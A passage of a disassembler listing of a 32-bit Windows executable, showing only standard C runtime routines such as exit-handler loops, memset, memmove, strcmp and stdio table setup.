		call	ds:dword_41E0E0	; GetModuleHandleA
		test	eax, eax
		jz	short locret_407E66
		push	offset aCorexitprocess ; "CorExitProcess"
		push	eax
		call	ds:off_41E0E8
		test	eax, eax
		jz	short locret_407E66
		push	[esp+arg_0]
		call	eax

locret_407E66:				; CODE XREF: sub_407E41+Dj
					; sub_407E41+1Dj
		retn
sub_407E41	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E67	proc near		; CODE XREF: sub_403C6E+34p
					; sub_40449D+1Cp ...

arg_0		= dword	ptr  4

		push	[esp+arg_0]
		call	sub_407E41
		pop	ecx
		push	[esp+arg_0]
		call	ds:off_41E050
		int	3		; Trap to Debugger
sub_407E67	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_407E7C	proc near		; CODE XREF: sub_403373+Cp
		push	8
		call	sub_405FB7
		pop	ecx
		retn
sub_407E7C	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E85	proc near		; CODE XREF: sub_4033A9p
		push	8
		call	sub_405EDF
		pop	ecx
		retn
sub_407E85	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E8E	proc near		; CODE XREF: sub_407FCB+78p
					; sub_407FCB+88p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, eax
		jmp	short loc_407E9E
; ---------------------------------------------------------------------------

loc_407E93:				; CODE XREF: sub_407E8E+14j
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_407E9B
		call	eax

loc_407E9B:				; CODE XREF: sub_407E8E+9j
		add	esi, 4

loc_407E9E:				; CODE XREF: sub_407E8E+3j
		cmp	esi, [esp+4+arg_0]
		jb	short loc_407E93
		pop	esi
		retn
sub_407E8E	endp


; =============== S U B	R O U T	I N E =======================================



sub_407EA6	proc near		; CODE XREF: sub_407F39+32p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		mov	esi, [esp+4+arg_0]
		xor	eax, eax
		jmp	short loc_407EBE
; ---------------------------------------------------------------------------

loc_407EAF:				; CODE XREF: sub_407EA6+1Cj
		test	eax, eax
		jnz	short loc_407EC4
		mov	ecx, [esi]
		test	ecx, ecx
		jz	short loc_407EBB
		call	ecx

loc_407EBB:				; CODE XREF: sub_407EA6+11j
		add	esi, 4

loc_407EBE:				; CODE XREF: sub_407EA6+7j
		cmp	esi, [esp+4+arg_4]
		jb	short loc_407EAF

loc_407EC4:				; CODE XREF: sub_407EA6+Bj
		pop	esi
		retn
sub_407EA6	endp


; =============== S U B	R O U T	I N E =======================================



sub_407EC6	proc near		; CODE XREF: sub_405FE8+12p
					; sub_40D0D4+27p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	ecx, esi
		jnz	short loc_407EEE

loc_407ED1:				; CODE XREF: sub_407EC6+2Fj
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		push	16h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_407EEE:				; CODE XREF: sub_407EC6+9j
		mov	eax, dword_4282D8
		cmp	eax, esi
		jz	short loc_407ED1
		mov	[ecx], eax
		xor	eax, eax
		pop	esi
		retn
sub_407EC6	endp


; =============== S U B	R O U T	I N E =======================================



sub_407EFD	proc near		; CODE XREF: sub_405FE8+2Dp
					; sub_40FAE4+11Fp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_407F25

loc_407F08:				; CODE XREF: sub_407EFD+2Ej
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		push	16h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_407F25:				; CODE XREF: sub_407EFD+9j
		cmp	dword_4282D8, esi
		jz	short loc_407F08
		mov	ecx, dword_4282E4
		mov	[eax], ecx
		xor	eax, eax
		pop	esi
		retn
sub_407EFD	endp


; =============== S U B	R O U T	I N E =======================================



sub_407F39	proc near		; CODE XREF: .text:00404647p

arg_0		= dword	ptr  4

		cmp	ds:off_41FDB4, 0
		jz	short loc_407F5C
		push	offset off_41FDB4
		call	sub_40D212
		test	eax, eax
		pop	ecx
		jz	short loc_407F5C
		push	[esp+arg_0]
		call	ds:off_41FDB4
		pop	ecx

loc_407F5C:				; CODE XREF: sub_407F39+7j
					; sub_407F39+16j
		call	sub_40DB5E
		push	offset dword_41E2F8
		push	offset dword_41E2DC
		call	sub_407EA6
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short locret_407FCA
		push	esi
		push	edi
		push	offset sub_40B626
		call	sub_4033AF
		mov	esi, offset dword_41E288
		mov	eax, esi
		mov	edi, offset dword_41E2D8
		cmp	eax, edi
		pop	ecx
		jnb	short loc_407FA2

loc_407F93:				; CODE XREF: sub_407F39+67j
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_407F9B
		call	eax

loc_407F9B:				; CODE XREF: sub_407F39+5Ej
		add	esi, 4
		cmp	esi, edi
		jb	short loc_407F93

loc_407FA2:				; CODE XREF: sub_407F39+58j
		cmp	dword_438838, 0
		pop	edi
		pop	esi
		jz	short loc_407FC8
		push	offset dword_438838
		call	sub_40D212
		test	eax, eax
		pop	ecx
		jz	short loc_407FC8
		push	0
		push	2
		push	0
		call	dword_438838

loc_407FC8:				; CODE XREF: sub_407F39+72j
					; sub_407F39+81j
		xor	eax, eax

locret_407FCA:				; CODE XREF: sub_407F39+3Bj
		retn
sub_407F39	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_407FCB	proc near		; CODE XREF: sub_408099+8p
					; sub_4080AA+8p ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

; FUNCTION CHUNK AT 00408093 SIZE 00000006 BYTES

		push	0Ch
		push	offset dword_422A68
		call	__SEH_prolog4
		push	8
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		xor	esi, esi
		inc	esi
		cmp	dword_428318, esi
		jz	short loc_408059
		mov	dword_428314, esi
		mov	al, byte ptr [ebp+arg_8]
		mov	byte_428310, al
		cmp	[ebp+arg_4], 0
		jnz	short loc_408049
		push	dword_438830
		call	sub_405753
		mov	edi, eax
		push	dword_43882C
		call	sub_405753
		pop	ecx
		pop	ecx
		mov	[ebp+var_1C], eax
		test	edi, edi
		jz	short loc_408039

loc_408023:				; CODE XREF: sub_407FCB+68j
					; sub_407FCB+6Cj
		sub	[ebp+var_1C], 4
		cmp	[ebp+var_1C], edi
		jb	short loc_408039
		mov	eax, [ebp+var_1C]
		mov	eax, [eax]
		test	eax, eax
		jz	short loc_408023
		call	eax
		jmp	short loc_408023
; ---------------------------------------------------------------------------

loc_408039:				; CODE XREF: sub_407FCB+56j
					; sub_407FCB+5Fj
		push	offset dword_41E308
		mov	eax, offset dword_41E2FC
		call	sub_407E8E
		pop	ecx

loc_408049:				; CODE XREF: sub_407FCB+35j
		push	offset dword_41E314
		mov	eax, offset dword_41E30C
		call	sub_407E8E
		pop	ecx

loc_408059:				; CODE XREF: sub_407FCB+21j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_408084
		cmp	[ebp+arg_8], 0
		jnz	short loc_408093
		mov	dword_428318, esi
		push	8
		call	sub_405EDF
		pop	ecx
		push	[ebp+arg_0]
		call	sub_407E67

loc_408081:				; DATA XREF: jlrllt49:00422A80o
		xor	esi, esi
		inc	esi
sub_407FCB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_408084	proc near		; CODE XREF: sub_407FCB+95p
		cmp	dword ptr [ebp+10h], 0
		jz	short locret_408092
		push	8
		call	sub_405EDF
		pop	ecx

locret_408092:				; CODE XREF: sub_408084+4j
		retn
sub_408084	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_407FCB

loc_408093:				; CODE XREF: sub_407FCB+9Ej
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_407FCB

; =============== S U B	R O U T	I N E =======================================



sub_408099	proc near		; CODE XREF: .text:00404683p

arg_0		= dword	ptr  4

		push	0
		push	0
		push	[esp+8+arg_0]
		call	sub_407FCB
		add	esp, 0Ch
		retn
sub_408099	endp


; =============== S U B	R O U T	I N E =======================================



sub_4080AA	proc near		; CODE XREF: .text:004046B3p
					; sub_40E2E9+D9p ...

arg_0		= dword	ptr  4

		push	0
		push	1
		push	[esp+8+arg_0]
		call	sub_407FCB
		add	esp, 0Ch
		retn
sub_4080AA	endp


; =============== S U B	R O U T	I N E =======================================



sub_4080BB	proc near		; CODE XREF: .text:loc_404688p
		push	1
		push	0
		push	0
		call	sub_407FCB
		add	esp, 0Ch
		retn
sub_4080BB	endp


; =============== S U B	R O U T	I N E =======================================



sub_4080CA	proc near		; CODE XREF: .text:loc_4046B8p
		push	1
		push	1
		push	0
		call	sub_407FCB
		add	esp, 0Ch
		retn
sub_4080CA	endp


; =============== S U B	R O U T	I N E =======================================



sub_4080D9	proc near		; CODE XREF: sub_405A96+C4p
		push	esi
		call	sub_40574A
		mov	esi, eax
		push	esi
		call	sub_408618
		push	esi
		call	sub_40D0BA
		push	esi
		call	sub_4033C1
		push	esi
		call	sub_40E4A3
		push	esi
		call	sub_40E499
		push	esi
		call	sub_40E28F
		push	esi
		call	nullsub_445
		push	esi
		call	sub_40C49C
		push	offset sub_4080AA
		call	sub_4056E7
		add	esp, 24h
		mov	off_424930, eax
		pop	esi
		retn
sub_4080D9	endp


; =============== S U B	R O U T	I N E =======================================



sub_408125	proc near		; CODE XREF: sub_4033CB+CEp
					; sub_4034C7+18p ...
		and	dword_438824, 0
		retn
sub_408125	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_408130	proc near		; CODE XREF: sub_40177B+4Ap
					; sub_40177B+5Ep ...

arg_0		= dword	ptr  4
arg_4		= byte ptr  8
arg_8		= dword	ptr  0Ch

		mov	edx, [esp+arg_8]
		mov	ecx, [esp+arg_0]
		test	edx, edx
		jz	short loc_4081A5
		xor	eax, eax
		mov	al, [esp+arg_4]
		test	al, al
		jnz	short loc_40815C
		cmp	edx, 100h
		jb	short loc_40815C
		cmp	dword_4376DC, 0
		jz	short loc_40815C
		jmp	sub_40E504
; ---------------------------------------------------------------------------

loc_40815C:				; CODE XREF: sub_408130+14j
					; sub_408130+1Cj ...
		push	edi
		mov	edi, ecx
		cmp	edx, 4
		jb	short loc_408195
		neg	ecx
		and	ecx, 3
		jz	short loc_408177
		sub	edx, ecx

loc_40816D:				; CODE XREF: sub_408130+45j
		mov	[edi], al
		add	edi, 1
		sub	ecx, 1
		jnz	short loc_40816D

loc_408177:				; CODE XREF: sub_408130+39j
		mov	ecx, eax
		shl	eax, 8
		add	eax, ecx
		mov	ecx, eax
		shl	eax, 10h
		add	eax, ecx
		mov	ecx, edx
		and	edx, 3
		shr	ecx, 2
		jz	short loc_408195
		rep stosd
		test	edx, edx
		jz	short loc_40819F

loc_408195:				; CODE XREF: sub_408130+32j
					; sub_408130+5Dj ...
		mov	[edi], al
		add	edi, 1
		sub	edx, 1
		jnz	short loc_408195

loc_40819F:				; CODE XREF: sub_408130+63j
		mov	eax, [esp+4+arg_0]
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_4081A5:				; CODE XREF: sub_408130+Aj
		mov	eax, [esp+arg_0]
		retn
sub_408130	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4081B0	proc near		; CODE XREF: sub_403500+43p
					; sub_409398+35p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		mov	esi, [ebp+arg_4]
		mov	ecx, [ebp+arg_8]
		mov	edi, [ebp+arg_0]
		mov	eax, ecx
		mov	edx, ecx
		add	eax, esi
		cmp	edi, esi
		jbe	short loc_4081D0
		cmp	edi, eax
		jb	loc_408374

loc_4081D0:				; CODE XREF: sub_4081B0+16j
		cmp	ecx, 100h
		jb	short loc_4081F7
		cmp	dword_4376DC, 0
		jz	short loc_4081F7
		push	edi
		push	esi
		and	edi, 0Fh
		and	esi, 0Fh
		cmp	edi, esi
		pop	esi
		pop	edi
		jnz	short loc_4081F7
		pop	esi
		pop	edi
		pop	ebp
		jmp	sub_40DE2C
; ---------------------------------------------------------------------------

loc_4081F7:				; CODE XREF: sub_4081B0+26j
					; sub_4081B0+2Fj ...
		test	edi, 3
		jnz	short loc_408214
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_408234
		rep movsd
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408214:				; CODE XREF: sub_4081B0+4Dj
		mov	eax, edi
		mov	edx, 3
		sub	ecx, 4
		jb	short loc_40822C
		and	eax, 3
		add	ecx, eax
		jmp	dword ptr ds:loc_408234+4[eax*4]
; ---------------------------------------------------------------------------

loc_40822C:				; CODE XREF: sub_4081B0+6Ej
		jmp	dword ptr ds:loc_408334[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408234:				; CODE XREF: sub_4081B0+58j
					; sub_4081B0+B6j ...
		jmp	ds:off_4082B8[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_408248
		dd offset loc_408274
		dd offset loc_408298
; ---------------------------------------------------------------------------

loc_408248:				; DATA XREF: sub_4081B0+8Co
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		add	esi, 3
		add	edi, 3
		cmp	ecx, 8
		jb	short loc_408234
		rep movsd
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408274:				; DATA XREF: sub_4081B0+90o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		add	esi, 2
		add	edi, 2
		cmp	ecx, 8
		jb	short loc_408234
		rep movsd
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408298:				; DATA XREF: sub_4081B0+94o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		add	esi, 1
		shr	ecx, 2
		add	edi, 1
		cmp	ecx, 8
		jb	short loc_408234
		rep movsd
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_4082B8	dd offset loc_40831B	; DATA XREF: sub_4081B0:loc_408234r
		dd offset loc_408308
		dd offset loc_408300
		dd offset loc_4082F8
		dd offset loc_4082F0
		dd offset loc_4082E8
		dd offset loc_4082E0
		dd offset loc_4082D8
; ---------------------------------------------------------------------------

loc_4082D8:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+124o
		mov	eax, [esi+ecx*4-1Ch]
		mov	[edi+ecx*4-1Ch], eax

loc_4082E0:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+120o
		mov	eax, [esi+ecx*4-18h]
		mov	[edi+ecx*4-18h], eax

loc_4082E8:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+11Co
		mov	eax, [esi+ecx*4-14h]
		mov	[edi+ecx*4-14h], eax

loc_4082F0:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+118o
		mov	eax, [esi+ecx*4-10h]
		mov	[edi+ecx*4-10h], eax

loc_4082F8:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+114o
		mov	eax, [esi+ecx*4-0Ch]
		mov	[edi+ecx*4-0Ch], eax

loc_408300:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+110o
		mov	eax, [esi+ecx*4-8]
		mov	[edi+ecx*4-8], eax

loc_408308:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0+10Co
		mov	eax, [esi+ecx*4-4]
		mov	[edi+ecx*4-4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_40831B:				; CODE XREF: sub_4081B0:loc_408234j
					; DATA XREF: sub_4081B0:off_4082B8o
		jmp	ds:off_408324[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_408324	dd offset loc_408334	; DATA XREF: sub_4081B0+5Cr
					; sub_4081B0+BAr ...
		dd offset loc_40833C
		dd offset loc_408348
		dd offset loc_40835C
; ---------------------------------------------------------------------------

loc_408334:				; CODE XREF: sub_4081B0+5Cj
					; sub_4081B0+BAj ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_40833C:				; CODE XREF: sub_4081B0+5Cj
					; sub_4081B0+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_408348:				; CODE XREF: sub_4081B0+5Cj
					; sub_4081B0+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_40835C:				; CODE XREF: sub_4081B0+5Cj
					; sub_4081B0+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_408374:				; CODE XREF: sub_4081B0+1Aj
		lea	esi, [ecx+esi-4]
		lea	edi, [ecx+edi-4]
		test	edi, 3
		jnz	short loc_4083A8
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_40839C
		std
		rep movsd
		cld
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_40839C:				; CODE XREF: sub_4081B0+1DDj
					; sub_4081B0+238j ...
		neg	ecx
		jmp	ds:off_408470[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_4083A8:				; CODE XREF: sub_4081B0+1D2j
		mov	eax, edi
		mov	edx, 3
		cmp	ecx, 4
		jb	short loc_4083C0
		and	eax, 3
		sub	ecx, eax
		jmp	dword ptr ds:loc_4083C0+4[eax*4]
; ---------------------------------------------------------------------------

loc_4083C0:				; CODE XREF: sub_4081B0+202j
					; DATA XREF: sub_4081B0+209r
		jmp	ds:off_4084C0[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		aam	83h
		inc	eax
		add	al, bh
		add	dword ptr [eax+0], 20h
		test	[eax+0], al
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		sub	esi, 1
		shr	ecx, 2
		sub	edi, 1
		cmp	ecx, 8
		jb	short loc_40839C
		std
		rep movsd
		cld
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 4
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		sub	esi, 2
		sub	edi, 2
		cmp	ecx, 8
		jb	short loc_40839C
		std
		rep movsd
		cld
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 10h
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		sub	esi, 3
		sub	edi, 3
		cmp	ecx, 8
		jb	loc_40839C
		std
		rep movsd
		cld
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_408474
		dd offset loc_40847C
		dd offset loc_408484
		dd offset loc_40848C
		dd offset loc_408494
		dd offset loc_40849C
		dd offset loc_4084A4
off_408470	dd offset loc_4084B7	; DATA XREF: sub_4081B0+1EEr
; ---------------------------------------------------------------------------

loc_408474:				; DATA XREF: sub_4081B0+2A4o
		mov	eax, [esi+ecx*4+1Ch]
		mov	[edi+ecx*4+1Ch], eax

loc_40847C:				; DATA XREF: sub_4081B0+2A8o
		mov	eax, [esi+ecx*4+18h]
		mov	[edi+ecx*4+18h], eax

loc_408484:				; DATA XREF: sub_4081B0+2ACo
		mov	eax, [esi+ecx*4+14h]
		mov	[edi+ecx*4+14h], eax

loc_40848C:				; DATA XREF: sub_4081B0+2B0o
		mov	eax, [esi+ecx*4+10h]
		mov	[edi+ecx*4+10h], eax

loc_408494:				; DATA XREF: sub_4081B0+2B4o
		mov	eax, [esi+ecx*4+0Ch]
		mov	[edi+ecx*4+0Ch], eax

loc_40849C:				; DATA XREF: sub_4081B0+2B8o
		mov	eax, [esi+ecx*4+8]
		mov	[edi+ecx*4+8], eax

loc_4084A4:				; DATA XREF: sub_4081B0+2BCo
		mov	eax, [esi+ecx*4+4]
		mov	[edi+ecx*4+4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_4084B7:				; CODE XREF: sub_4081B0+1EEj
					; DATA XREF: sub_4081B0:off_408470o
		jmp	ds:off_4084C0[edx*4]
; ---------------------------------------------------------------------------
		align 10h
off_4084C0	dd offset loc_4084D0	; DATA XREF: sub_4081B0+1E3r
					; sub_4081B0:loc_4083C0r ...
		dd offset loc_4084D8
		dd offset loc_4084E8
		dd offset loc_4084FC
; ---------------------------------------------------------------------------

loc_4084D0:				; CODE XREF: sub_4081B0+1E3j
					; sub_4081B0:loc_4083C0j ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4084D8:				; CODE XREF: sub_4081B0+1E3j
					; sub_4081B0:loc_4083C0j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4084E8:				; CODE XREF: sub_4081B0+1E3j
					; sub_4081B0:loc_4083C0j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4084FC:				; CODE XREF: sub_4081B0+1E3j
					; sub_4081B0:loc_4083C0j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
sub_4081B0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408515	proc near		; CODE XREF: sub_40357B+7p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422A88
		call	__SEH_prolog4
		push	0Eh
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [ebp+arg_0]
		mov	ecx, [esi+4]
		test	ecx, ecx
		jz	short loc_408566
		mov	eax, dword_428320
		mov	edx, offset dword_42831C

loc_408541:				; CODE XREF: sub_408515+65j
		mov	[ebp+var_1C], eax
		test	eax, eax
		jz	short loc_408559
		cmp	[eax], ecx
		jnz	short loc_408578
		mov	ecx, [eax+4]
		mov	[edx+4], ecx
		push	eax
		call	sub_403B91
		pop	ecx

loc_408559:				; CODE XREF: sub_408515+31j
		push	dword ptr [esi+4]
		call	sub_403B91
		pop	ecx
		and	dword ptr [esi+4], 0

loc_408566:				; CODE XREF: sub_408515+20j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40857C
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_408578:				; CODE XREF: sub_408515+35j
		mov	edx, eax
		jmp	short loc_408541
sub_408515	endp


; =============== S U B	R O U T	I N E =======================================



sub_40857C	proc near		; CODE XREF: sub_408515+58p
					; DATA XREF: jlrllt49:00422AA0o
		push	0Eh
		call	sub_405EDF
		pop	ecx
		retn
sub_40857C	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_408590	proc near		; CODE XREF: sub_4035A5+Cp
					; sub_40B7BC+25p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_0]
		mov	ecx, [esp+arg_4]
		test	edx, 3
		jnz	short loc_4085DC

loc_4085A0:				; CODE XREF: sub_408590+3Cj
					; sub_408590+6Aj ...
		mov	eax, [edx]
		cmp	al, [ecx]
		jnz	short loc_4085D4
		or	al, al
		jz	short loc_4085D0
		cmp	ah, [ecx+1]
		jnz	short loc_4085D4
		or	ah, ah
		jz	short loc_4085D0
		shr	eax, 10h
		cmp	al, [ecx+2]
		jnz	short loc_4085D4
		or	al, al
		jz	short loc_4085D0
		cmp	ah, [ecx+3]
		jnz	short loc_4085D4
		add	ecx, 4
		add	edx, 4
		or	ah, ah
		jnz	short loc_4085A0
		mov	edi, edi

loc_4085D0:				; CODE XREF: sub_408590+18j
					; sub_408590+21j ...
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4085D4:				; CODE XREF: sub_408590+14j
					; sub_408590+1Dj ...
		sbb	eax, eax
		shl	eax, 1
		add	eax, 1
		retn
; ---------------------------------------------------------------------------

loc_4085DC:				; CODE XREF: sub_408590+Ej
		test	edx, 1
		jz	short loc_4085FC
		mov	al, [edx]
		add	edx, 1
		cmp	al, [ecx]
		jnz	short loc_4085D4
		add	ecx, 1
		or	al, al
		jz	short loc_4085D0
		test	edx, 2
		jz	short loc_4085A0

loc_4085FC:				; CODE XREF: sub_408590+52j
		mov	ax, [edx]
		add	edx, 2
		cmp	al, [ecx]
		jnz	short loc_4085D4
		or	al, al
		jz	short loc_4085D0
		cmp	ah, [ecx+1]
		jnz	short loc_4085D4
		or	ah, ah
		jz	short loc_4085D0
		add	ecx, 2
		jmp	short loc_4085A0
sub_408590	endp


; =============== S U B	R O U T	I N E =======================================



sub_408618	proc near		; CODE XREF: sub_4080D9+9p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_428324, eax
		retn
sub_408618	endp


; =============== S U B	R O U T	I N E =======================================



sub_408622	proc near		; CODE XREF: sub_4035D9+Bp
					; sub_403C6E+8Cp ...

arg_0		= dword	ptr  4

		push	dword_428324
		call	sub_405753
		test	eax, eax
		pop	ecx
		jz	short loc_408641
		push	[esp+arg_0]
		call	eax ; sub_41CDC9
		test	eax, eax
		pop	ecx
		jz	short loc_408641
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------

loc_408641:				; CODE XREF: sub_408622+Ej
					; sub_408622+19j
		xor	eax, eax
		retn
sub_408622	endp


; =============== S U B	R O U T	I N E =======================================



sub_408644	proc near		; CODE XREF: sub_406D96+76p
					; sub_406D96+82p ...
		mov	eax, offset off_424950
		retn
sub_408644	endp


; =============== S U B	R O U T	I N E =======================================



sub_40864A	proc near		; DATA XREF: jlrllt49:0041E2E8o
		mov	eax, dword_438820
		test	eax, eax
		push	esi
		push	14h
		pop	esi
		jnz	short loc_40865E
		mov	eax, 200h
		jmp	short loc_408664
; ---------------------------------------------------------------------------

loc_40865E:				; CODE XREF: sub_40864A+Bj
		cmp	eax, esi
		jge	short loc_408669
		mov	eax, esi

loc_408664:				; CODE XREF: sub_40864A+12j
		mov	dword_438820, eax

loc_408669:				; CODE XREF: sub_40864A+16j
		push	4
		push	eax
		call	sub_407D3A
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	dword_437800, eax
		jnz	short loc_40869A
		push	4
		push	esi
		mov	dword_438820, esi
		call	sub_407D3A
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	dword_437800, eax
		jnz	short loc_40869A
		push	1Ah
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40869A:				; CODE XREF: sub_40864A+30j
					; sub_40864A+49j
		xor	edx, edx
		mov	ecx, offset off_424950
		jmp	short loc_4086A8
; ---------------------------------------------------------------------------

loc_4086A3:				; CODE XREF: sub_40864A+6Dj
		mov	eax, dword_437800

loc_4086A8:				; CODE XREF: sub_40864A+57j
		mov	[edx+eax], ecx
		add	ecx, 20h
		add	edx, 4
		cmp	ecx, offset dword_424BD0
		jl	short loc_4086A3
		push	0FFFFFFFEh
		pop	esi
		xor	edx, edx
		mov	ecx, offset dword_424960
		push	edi

loc_4086C4:				; CODE XREF: sub_40864A+AAj
		mov	edi, edx
		and	edi, 1Fh
		imul	edi, 28h
		mov	eax, edx
		sar	eax, 5
		mov	eax, dword_437700[eax*4]
		mov	eax, [edi+eax]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_4086E8
		cmp	eax, esi
		jz	short loc_4086E8
		test	eax, eax
		jnz	short loc_4086EA

loc_4086E8:				; CODE XREF: sub_40864A+94j
					; sub_40864A+98j
		mov	[ecx], esi

loc_4086EA:				; CODE XREF: sub_40864A+9Cj
		add	ecx, 20h
		inc	edx
		cmp	ecx, offset dword_4249C0
		jl	short loc_4086C4
		pop	edi
		xor	eax, eax
		pop	esi
		retn
sub_40864A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4086FB	proc near		; DATA XREF: jlrllt49:0041E304o
		call	sub_409318
		cmp	byte_428310, 0
		jz	short loc_40870E
		call	sub_40E593

